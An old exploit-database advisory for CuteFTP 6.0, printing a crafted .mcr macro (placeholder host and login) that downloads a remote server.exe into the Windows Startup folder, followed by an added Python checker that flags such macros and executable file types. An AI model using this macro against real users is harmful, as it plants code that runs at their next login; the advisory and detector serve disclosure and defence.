
GlobalScape - CuteFTP macros '.mcr' Local File Write

Author: ATmaCA
type: local
platform: windows
port: 
date_added: 2004-09-27 
date_updated: 2017-11-22 
verified: 1 
codes: OSVDB-18941 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comcuteftp60.exe

Application:  GlobalSCAPE CuteFTP V6.0
             http://www.globalscape.com/

Risk:         Medium

/*
e-mail: atmaca@prohack.net
web: http://www.prohack.net
*/

--The bug:

An attacker can create a crafted CuteFTP macro (*.mcr);
when it is loaded on the target computer, it can download an arbitrary file
into the target user's Startup folder.

----example *.mcr macro----

Host FTP_HOST_HERE
Login Normal
User FTP_USER_HERE
Pass FTP_PASS_HERE
Connect
RemoteSelect server.exe
Download
LocalCwd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\


# milw0rm.com [2004-09-28]
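
A defensive check for the macro pattern above, added here as an example and not part of the original advisory: it parses a .mcr file and flags a LocalCwd into a Startup folder combined with Download. It assumes the one-command-per-line layout of the sample macro; the function names, verdict labels, extension list and the benign macro are constructed for illustration.

```python
import re

# Assumption: one "Command argument" pair per line, as in the sample macro.
STARTUP_RE = re.compile(r"\\start menu\\programs\\startup(\\|$)", re.IGNORECASE)
EXEC_EXTS = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".js", ".lnk")

def parse_macro(text):
    """Split macro text into (line_no, command, argument) tuples."""
    steps = []
    for no, raw in enumerate(text.splitlines(), 1):
        cmd, _, arg = raw.strip().partition(" ")
        if cmd:
            steps.append((no, cmd.lower(), arg.strip()))
    return steps

def audit_macro(text):
    """Return (verdict, findings) for one macro; findings are in line order."""
    steps = parse_macro(text)
    findings = []
    to_startup = False
    for no, cmd, arg in steps:
        if cmd == "localcwd" and STARTUP_RE.search(arg):
            to_startup = True
            findings.append((no, "local directory is a Startup folder", arg))
        elif cmd == "remoteselect" and arg.lower().endswith(EXEC_EXTS):
            findings.append((no, "selects an executable file type", arg))
    downloads = any(cmd == "download" for _, cmd, _ in steps)
    # The sample issues Download before LocalCwd, so command order is ignored.
    if to_startup and downloads:
        return "block", findings
    return ("review" if findings else "ok"), findings

# The macro from the advisory (placeholders as published) and a constructed benign one.
ADVISORY_MACRO = r"""Host FTP_HOST_HERE
Login Normal
User FTP_USER_HERE
Pass FTP_PASS_HERE
Connect
RemoteSelect server.exe
Download
LocalCwd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\
"""
BENIGN_MACRO = r"""Host ftp.example.org
Connect
RemoteSelect report.pdf
Download
LocalCwd C:\Users\alice\Documents
"""
```

`audit_macro` can be run over every .mcr file received by mail or found on shared storage before it is opened in CuteFTP; a "block" verdict means the macro both downloads and points the local directory at a Startup folder.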